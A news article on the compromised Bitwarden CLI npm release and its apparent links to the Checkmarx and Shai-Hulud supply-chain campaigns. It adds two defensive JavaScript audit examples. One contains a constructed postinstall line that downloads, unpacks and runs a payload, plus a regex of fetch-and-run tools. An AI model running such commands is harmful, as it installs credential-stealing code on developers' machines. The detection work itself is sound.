Bitwarden NPM Package Hit in Supply Chain Attack

By Admin
April 24, 2026


The Bitwarden command-line interface (CLI) NPM package was compromised in a supply chain attack that appears tied to earlier campaigns against the open source software (OSS) ecosystem.

One of the most popular open source password management platforms, with over 250,000 monthly downloads, Bitwarden allows enterprises to secure authentication with zero-knowledge encryption, password sharing, and policy and credential management.

On Thursday, several security firms warned that version 2026.4.0 of the Bitwarden CLI's NPM package contained malicious code that fetches a JavaScript payload designed to steal credentials and secrets from victim machines.

The malicious package contained an altered execution path that runs a malicious loader, downloads a Bun runtime archive from GitHub, extracts it, and executes the JavaScript payload.
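Two checks a practitioner wants to run immediately after reading the paragraph above are "is the bad version pinned anywhere in my lockfiles?" and "which packages get to run code at install time at all?", since an install-lifecycle script is the usual hook through which a trojanized package launches its loader. The following audit is an added example written for this article; it is not Bitwarden's, JFrog's or any vendor's code. It assumes the affected package is published as `@bitwarden/cli` (the article only says "the Bitwarden CLI NPM package"), and the lockfile and manifest it runs on are constructed samples, not the real package contents. It reads the lockfile v2/v3 layout that npm 7+ writes, including npm's own `hasInstallScript` marker, and flags lifecycle scripts that look like they download and execute something.

```javascript
// Added example (not Bitwarden's, JFrog's or any vendor's code): audit an npm
// package-lock.json (lockfile v2/v3 layout) for a known-bad package version and
// surface packages that hook the install lifecycle, since an install-time script
// is how a trojanized package gets its loader executed by `npm install`.
// ASSUMPTION: the affected package is @bitwarden/cli; the page only says
// "the Bitwarden CLI NPM package". All sample data below is constructed.

const BAD_VERSIONS = { '@bitwarden/cli': new Set(['2026.4.0']) };
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];
// Heuristic for "fetch something and run it" inside a lifecycle script.
const FETCH_AND_RUN = /\b(curl|wget|https?:\/\/|unzip|tar\s+-?[a-z]*x|bun\b|node\s+-e|eval\s*\()/i;

// Package name from a lockfile key such as "node_modules/@bitwarden/cli" or
// "node_modules/a/node_modules/@s/b" (nested install): take the last segment.
function packageName(lockKey) {
  const marker = 'node_modules/';
  const i = lockKey.lastIndexOf(marker);
  return i === -1 ? lockKey : lockKey.slice(i + marker.length);
}

// Lockfile-level checks: known-bad versions, plus every entry npm itself marked
// with hasInstallScript (npm sets this flag in lockfile v2/v3 for packages that
// declare install-time scripts), so the review list exists without reading
// each manifest.
function auditLockfile(lock) {
  const badVersions = [];
  const installScripts = [];
  for (const [key, entry] of Object.entries(lock.packages || {})) {
    if (key === '') continue; // "" is the root project itself
    const name = packageName(key);
    const bad = BAD_VERSIONS[name];
    if (bad && bad.has(entry.version)) badVersions.push({ key, name, version: entry.version });
    if (entry.hasInstallScript === true) installScripts.push({ key, name, version: entry.version });
  }
  return { badVersions, installScripts };
}

// Manifest-level check: list install-time lifecycle scripts and flag the ones
// that look like they download and execute something.
function auditManifest(manifest) {
  const scripts = manifest.scripts || {};
  return INSTALL_HOOKS
    .filter((hook) => typeof scripts[hook] === 'string')
    .map((hook) => ({ hook, command: scripts[hook], fetchesAndRuns: FETCH_AND_RUN.test(scripts[hook]) }));
}

// --- constructed sample input (not the real package) ---------------------
const SAMPLE_LOCK = {
  name: 'ci-tooling', lockfileVersion: 3,
  packages: {
    '': { name: 'ci-tooling', version: '1.0.0' },
    'node_modules/@bitwarden/cli': { version: '2026.4.0', hasInstallScript: true },
    'node_modules/chalk': { version: '5.3.0' },
    'node_modules/chalk/node_modules/ansi-styles': { version: '6.2.1' },
  },
};
// Constructed manifest whose postinstall mimics the behaviour the article
// describes (fetch an archive from GitHub, unpack it, run a JS payload with Bun).
const SAMPLE_MANIFEST = {
  name: '@bitwarden/cli', version: '2026.4.0',
  scripts: {
    build: 'tsc',
    postinstall: 'curl -fsSL https://github.com/example/example/releases/download/v1/bun.zip -o /tmp/b.zip && unzip -q /tmp/b.zip -d /tmp/b && /tmp/b/bun /tmp/b/payload.js',
  },
};

const report = { lockfile: auditLockfile(SAMPLE_LOCK), manifest: auditManifest(SAMPLE_MANIFEST) };
console.log(JSON.stringify(report, null, 2));
```

In a real repository, load `package-lock.json` and each `node_modules/<pkg>/package.json` from disk and pass them to the two functions; anything in `installScripts` deserves a look, and a hit in `badVersions` means the machine that ran `npm install` should be treated as compromised and its credentials rotated, not just the package downgraded.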

The malware contains three collectors targeting secrets and tokens across Azure, AWS, GitHub, GCP, and NPM, as well as SSH material, shell history, and AI tooling configuration and MCP-related files, JFrog explains.

Moreover, the payload weaponizes the GitHub tokens it finds and abuses GitHub Actions to create repositories in the victims' accounts, create branches, commit workflow files, and download the resulting artifacts to extract additional secret material; a workflow run executes with access to the repository's Actions secrets, so writing them into an artifact is a way to pull them out.
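Because the stolen token belongs to the victim, the actor on every one of those audit-log records is the victim's own account, so actor-based alerting does not catch it; what stands out is the timing: a repository is created, a workflow is pushed, and a run starts within minutes. The detection below is an added example written for this article (not OX Security's, Socket's or GitHub's code) that runs over constructed audit-log records in the JSON-export field shape (`action`, `actor`, `repo`, `@timestamp` in milliseconds) and uses the `repo.create`, `git.push` and `workflows.created_workflow_run` action names; the 30-minute window and the burst threshold are assumptions to tune.

```javascript
// Added example (not OX Security's, Socket's or GitHub's code): flag the
// "repo.create -> git.push -> workflow run" chain that a stolen token leaves in
// the GitHub audit log when it is used to create a repository, commit a workflow
// and run it to harvest CI secrets. The actor is the token's legitimate owner,
// so the tell is a workflow running minutes after the repository was created.
// Records use the audit-log JSON export field names (action, actor, repo,
// @timestamp in ms); the records themselves are constructed for this example.
// ASSUMPTIONS: 30-minute window, burst threshold of 3 repositories; tune both.

const WINDOW_MS = 30 * 60 * 1000;

// Group records by repository, oldest first.
function groupByRepo(events) {
  const byRepo = new Map();
  for (const e of [...events].sort((a, b) => a['@timestamp'] - b['@timestamp'])) {
    if (!byRepo.has(e.repo)) byRepo.set(e.repo, []);
    byRepo.get(e.repo).push(e);
  }
  return byRepo;
}

// One alert per repository that was created, pushed to, and had a workflow run
// started, in that order, with the run inside windowMs of creation.
function detectFreshRepoWorkflowRuns(events, windowMs = WINDOW_MS) {
  const alerts = [];
  for (const [repo, evs] of groupByRepo(events)) {
    const created = evs.find((e) => e.action === 'repo.create');
    if (!created) continue; // repo predates the log window; out of scope here
    const push = evs.find((e) => e.action === 'git.push' && e['@timestamp'] >= created['@timestamp']);
    if (!push) continue;
    const run = evs.find((e) => e.action === 'workflows.created_workflow_run' && e['@timestamp'] >= push['@timestamp']);
    if (!run) continue;
    const ageMs = run['@timestamp'] - created['@timestamp'];
    if (ageMs <= windowMs) {
      alerts.push({ repo, actor: created.actor, minutesFromCreateToRun: Math.round(ageMs / 60000) });
    }
  }
  return alerts;
}

// Second signal from the same behaviour: one actor creating several repositories
// in a short window (the payload creates repositories under the victim's account).
// Sliding window over each actor's sorted creation times.
function detectRepoCreationBursts(events, threshold = 3, windowMs = WINDOW_MS) {
  const byActor = new Map();
  for (const e of events.filter((x) => x.action === 'repo.create').sort((a, b) => a['@timestamp'] - b['@timestamp'])) {
    if (!byActor.has(e.actor)) byActor.set(e.actor, []);
    byActor.get(e.actor).push(e['@timestamp']);
  }
  const alerts = [];
  for (const [actor, times] of byActor) {
    let best = 0;
    for (let i = 0, j = 0; i < times.length; i++) {
      while (times[i] - times[j] > windowMs) j++;
      best = Math.max(best, i - j + 1);
    }
    if (best >= threshold) alerts.push({ actor, reposCreatedInWindow: best });
  }
  return alerts;
}

// --- constructed sample log (not real audit data) -------------------------
const T0 = Date.UTC(2026, 3, 23, 14, 0, 0);
const DAY = 86400000, MIN = 60000;
const SAMPLE_EVENTS = [
  // benign: repo created days earlier, workflow run much later
  { action: 'repo.create', actor: 'dev-alice', repo: 'dev-alice/notes', '@timestamp': T0 - 5 * DAY },
  { action: 'git.push', actor: 'dev-alice', repo: 'dev-alice/notes', '@timestamp': T0 - 5 * DAY + 60 * MIN },
  { action: 'workflows.created_workflow_run', actor: 'dev-alice', repo: 'dev-alice/notes', '@timestamp': T0 - 2 * DAY },
  // token abuse: repo born, workflow committed and run within minutes, more repos follow
  { action: 'repo.create', actor: 'dev-alice', repo: 'dev-alice/pipeline-cache', '@timestamp': T0 },
  { action: 'git.push', actor: 'dev-alice', repo: 'dev-alice/pipeline-cache', '@timestamp': T0 + 2 * MIN },
  { action: 'workflows.created_workflow_run', actor: 'dev-alice', repo: 'dev-alice/pipeline-cache', '@timestamp': T0 + 3 * MIN },
  { action: 'repo.create', actor: 'dev-alice', repo: 'dev-alice/build-helper', '@timestamp': T0 + 4 * MIN },
  { action: 'repo.create', actor: 'dev-alice', repo: 'dev-alice/sync', '@timestamp': T0 + 5 * MIN },
  // unrelated activity by someone else on an existing repo
  { action: 'git.push', actor: 'dev-bob', repo: 'acme/api', '@timestamp': T0 + MIN },
];

console.log(JSON.stringify({
  freshRepoRuns: detectFreshRepoWorkflowRuns(SAMPLE_EVENTS),
  creationBursts: detectRepoCreationBursts(SAMPLE_EVENTS),
}, null, 2));
```

Feed it the organization or enterprise audit-log export (or the same records pulled via the audit-log API) and treat either alert as a reason to revoke the actor's tokens and inspect the new repositories for workflow files and artifacts; the article's point that exfiltration to GitHub goes unnoticed by network tooling is exactly why this has to be detected in the audit log rather than at the egress.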


The malware attempts to exfiltrate the collected data via HTTPS but falls back to pushing it to GitHub repositories if that fails.

"The most notable aspect of this package is that it combines a supply chain compromise of a legitimate CLI identity with a broad post-install secret theft framework. Instead of stopping at .npmrc or a single PAT, the malware systematically pivots across local credentials, CI secrets, GitHub repositories, and multiple cloud secret stores," JFrog notes.

Bitwarden confirmed the supply chain hack, but noted that its investigation "found no evidence that end user vault data was accessed or at risk, or that production data or production systems were compromised".

The Checkmarx attack

The Bitwarden CLI compromise is linked to the recent supply chain attack on Checkmarx, which hit the company's public DockerHub KICS image, public ast-github-action, VS Code extension, and Developer Assist extension.

On April 22, Checkmarx confirmed the incident, sharing details on the malicious artifacts associated with the attack and urging users to immediately rotate secrets and credentials if they were affected.

The malware used in that attack was designed to harvest credentials and exfiltrate them to the checkmarx[.]cx domain, or to repositories created under the victim's GitHub account, a pattern used in the Bitwarden supply chain attack as well.

Socket's analysis of the two incidents also revealed the use of the same embedded payload structure, credential harvesting method, propagation technique, and Russian locale kill switch.

"The shared tooling strongly suggests a connection to the same malware ecosystem, but the operational signatures differ in ways that complicate attribution," Socket notes.

The TeamPCP and Shai-Hulud connections

The complication, the cybersecurity firm explains, comes from the fact that the Checkmarx attack was claimed by TeamPCP, while the Bitwarden incident references the Shai-Hulud worm that crawled through NPM last year.

Also known as DeadCatx3, PCPcat, and ShellForce, TeamPCP is a hacking group active since at least 2024 that has been focusing on supply chain attacks for the past year.

The hacking group made headlines over the past month after it compromised Aqua Security's Trivy vulnerability scanner to steal secrets and pivot across the OSS ecosystem and beyond.

As Socket notes, TeamPCP apparently claimed responsibility for the Checkmarx incident on social media, which did not come as a surprise, as it had hit the company's GitHub Actions and OpenVSX plugins as part of the March campaign.

However, the Bitwarden payload contains the "Shai-Hulud: The Third Coming" string, suggesting that the incident represents the latest phase of the earlier campaign, OX Security says.

Words such as atreides, fremen, sandworm, and sardaukar were also found in the code, which points to a possible overlap with the Shai-Hulud campaigns, but it does not definitively link TeamPCP to the earlier attacks, JFrog notes.

Shai-Hulud first emerged in the NPM registry in September, when it spread to more than 180 packages using stolen developer credentials. During a second wave in November, it infected over 640 packages.

"User data is being publicly exfiltrated to GitHub, often going undetected because security tools typically don't flag data being sent there. This makes the risk significantly more dangerous: anyone searching GitHub can potentially find and access these credentials. At that point, sensitive data is no longer in the hands of a single threat actor; it's exposed to anyone," said OX Security team lead Moshe Ben Siman Tov.
